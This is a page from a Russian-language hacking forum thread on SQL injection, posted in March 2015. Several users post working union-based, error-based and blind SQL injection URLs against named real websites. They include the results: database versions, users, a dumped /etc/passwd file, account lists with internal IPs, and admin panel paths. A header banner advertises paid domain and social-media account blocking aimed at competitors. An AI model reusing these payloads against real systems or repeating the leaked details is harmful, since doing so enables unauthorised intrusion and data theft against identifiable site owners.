УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 1602 из 1604

1602

Опции темы

Поиск в этой теме

Опции просмотра

#16011

04.03.2015, 19:57

psihoz26

Guest

Сообщений: n/a

Провел на форуме:
182660

Репутация: 324

Код:

Code:
http://www.shop.mpkpru.ru/public/places_personnel.php?id=619999912'+union+select+1,2,load_file('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,version(),25,26,27,28,29,30,31,32+--+

root@localhost

5.1.61

Код:

Code:
http://rosmir.iriran.ru/party.php?id=-102%27+union+select+1,2,3,4,5,load_file(%27/etc/passwd%27),7,concat(user(),0x3a,version()),9,10,11,12,13,14,15,16,17+--+

root@localhost

5.5.31

#16012

05.03.2015, 10:31

grimnir

Guest

Сообщений: n/a

Провел на форуме:
216062

Репутация: 231

Цитата:

Сообщение от None

http://www.coffeebean.com.sg/coffeebean/showcat2.cfm
?CFID=18465720
&CFTOKEN=0'+or+1=/**/cOnVeRt(int,(char(33)+char(126)+char(33)+(/**/cAsT(/**/dB_NaMe()+as+nvarchar))+char(33)+char(126)+char(33 )))--

error based cid_clientvariablestore@Microsoft SQL Server 2000 - 8

#16013

07.03.2015, 02:26

palec2006

Guest

Сообщений: n/a

Провел на форуме:
9263

Репутация: 8

ТИЦ:8500

PR:4

траф 100к+

Цитата:

Сообщение от None

http://tonkosti.ru/itourism/?p=5401&article=-1+union+all+select(array_to_string(ARRAY(select+ta ble_name||chr(46)||column_name||chr(60)||chr(98)|| chr(114)||chr(62)+from+information_schema.columns+ where+table_schema=%27tonkosti%27),%27,%27))

http://tonkosti.ru/

http://reestr-ta.ru/

http://pro.tonkosti.ru/

http://reklama.travel/

PHP 5.3.29

PostgreSQL 9.3.3 on x86_64-unknown-linux-gnu, compiled by gcc (GCC) 4.6.3 20120306 (Red Hat 4.6.3-2), 64-bit

MediaWiki и vBulletin примотанные к какому-то самопису

хэши HMAC-MD5(key = $salt) (формат для hashcat - хэш:логин)

http://admin.tonkosti.ru/

http://pro.tonkosti.ru/talk/manage/

http://reestr-ta.ru/admin/

http://reestr-ta.ru/server-info

http://reestr-ta.ru/?p=5/../../search_help

#16014

08.03.2015, 11:40

MaxFast

Guest

Сообщений: n/a

Провел на форуме:
178623

Репутация: 94

Код:

Code:
http://www.direct-line.ru/news_win.php?id=-2170 union select 1,load_file('/etc/passwd'),3,4--

Код:

Code:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/false daemon:x:2:2:daemon:/sbin:/bin/false adm:x:3:4:adm:/var/adm:/bin/false lp:x:4:7:lp:/var/spool/lpd:/bin/false sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/bin/false news:x:9:13:news:/usr/lib/news:/bin/false uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false operator:x:11:0:operator:/root:/bin/bash man:x:13:15:man:/usr/share/man:/bin/false postmaster:x:14:12:postmaster:/var/spool/mail:/bin/false smmsp:x:209:209:smmsp:/var/spool/mqueue:/bin/false portage:x:250:250:portage:/var/tmp/portage:/bin/false nobody:x:65534:65534:nobody:/:/bin/false sshd:x:22:22:added by portage for openssh:/var/empty:/sbin/nologin cron:x:16:16:added by portage for cronbase:/var/spool/cron:/sbin/nologin ftp:x:21:21:added by portage for ftpbase:/home/ftp:/sbin/nologin ldap:x:439:439:added by portage for openldap:/usr/lib/openldap:/sbin/nologin clamav:x:101:1002:added by portage for clamav:/dev/null:/sbin/nologin mysql:x:60:60:added by portage for mysql:/dev/null:/sbin/nologin apache:x:81:81:added by portage for apache:/var/www:/sbin/nologin postgres:x:70:70:added by portage for postgresql:/var/lib:/bin/bash dbmail:x:102:1003:added by portage for dbmail:/var/lib/dbmail:/sbin/nologin razor:x:1000:1004::/home/razor:/bin/bash reser:x:1001:1005::/home/reser:/bin/bash syncer:x:1002:1006::/home/syncer:/bin/bash

#16015

10.03.2015, 19:07

grimnir

Guest

Сообщений: n/a

Провел на форуме:
216062

Репутация: 231

Цитата:

Сообщение от None

http://www.christianjobwire.com/job/151715%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,concat%28version%28%29,0x3a,user% 28%29%29,NULL,NULL,NULL,NULL,NULL--%20.html

вывод внизу страницы 5.1.73-1:christianjobwire@10.208.38.175

#16016

12.03.2015, 09:23

palec2006

Guest

Сообщений: n/a

Провел на форуме:
9263

Репутация: 8

ТИЦ:210

PR:5

траф 30к

Цитата:

Сообщение от None

http://www.pulset.ru/club/statya.php?id_st=1*(ascii(substring((select+versio n()),1,1)))
смотрим id соответствующей статьи

Цитата:

Сообщение от None

http://www.pulset.ru/club/statya.php?id_st=15*(IF(ascii(substring((select+ve rsion()),1,1))+between+53+AND+54,5,2))
id_st=75 - TRUE

version:

5.5.41-MariaDB-1 squeeze-log

user:

club_media@localhost

database:

club_media

#16017

12.03.2015, 10:10

MaxFast

Guest

Сообщений: n/a

Провел на форуме:
178623

Репутация: 94

Код:

Code:
http://www.russia-review.ru/find.php?uid=1&fnd=-1' union select 1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13--

trwcm@localhost:wciom_tr:5.5.38

#16018

12.03.2015, 15:10

grimnir

Guest

Сообщений: n/a

Провел на форуме:
216062

Репутация: 231

Цитата:

Сообщение от None

http://news.singtao.ca/toronto/show_news.php?ID=9%20UNION%20ALL%20SELECT%20NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT%28ve rsion%28%29,0x3a,user%28%29%29,NULL--

трафф 570к корейцы в Канаде

ubuntu0.12.04.1-log:cmspro@54.235.156.247

''@'cms.singtao.ca'

''@'localhost'

'aitdev'@'%'

'ccue168'@'174.129.110.83'

'ccue168'@'23.20.187.239'

'ccue168'@'54.196.138.32'

'cmspro'@'%'

'cmspro'@'10.109.151.12'

'cmspro'@'10.157.0.40'

'cmspro'@'10.182.228.236'

'cmspro'@'10.231.168.34'

'cmspro'@'174.129.110.83'

'cmspro'@'216.250.115.119'

'cmspro'@'23.20.187.239'

'cmspro'@'54.196.138.32'

'cmspro'@'54.235.156.247'

'cmspro'@'54.235.74.234'

'cmspro'@'54.83.0.184'

'cmspro'@'74.208.110.10'

'cmspro'@'74.208.163.140'

'cmspro'@'ip-10-109-151-12.ec2.internal'

'cmspro'@'ip-10-170-19-124.ec2.internal'

'cmspro'@'ip-10-182-228-236.ec2.internal'

'cmspro'@'ip-10-28-191-150.ec2.internal'

'cmspro'@'localhost'

'cmsreal'@'54.235.156.247'

'cmsreal'@'54.235.74.234'

'cmsreal'@'localhost'

'debian-sys-maint'@'localhost'

'root'@'127.0.0.1'

'root'@'::1'

'root'@'cms.singtao.ca'

'root'@'localhost'

'vote'@'10.157.0.40'

'vote'@'ip-10-170-19-124.ec2.internal'

#16019

13.03.2015, 12:42

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

Отправить сообщение для DezMond™ с помощью ICQ

PR8

http://www.hochschulkompass.de/studium/suche/profisuche/search/1/studtyp/3.html?tx_szhrksearch_pi1%5Bxtend%5D=1&tx_szhrksea rch_pi1%5Bbundesland%5D%5B0%5D=2&tx_szhrksearch_pi 1%5Bresults_at_a_time%5D=100&tx_szhrksearch_pi1[pointer]=1&tx_szhrksearch_pi1[detail]=all&tx_szhrksearch_pi1%5Bbesform%5D%5B0%5D=d'+uni on+select+null,datname+from+pg_database+--

#16020

14.03.2015, 16:27

Unknown

Guest

Сообщений: n/a

Провел на форуме:
77731

Репутация: 33

Код:

Code:
http://www.vs.com.ua/a-news/news.php?id=-18+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,0x4861636b6564206279205365706f,7,8,9,10--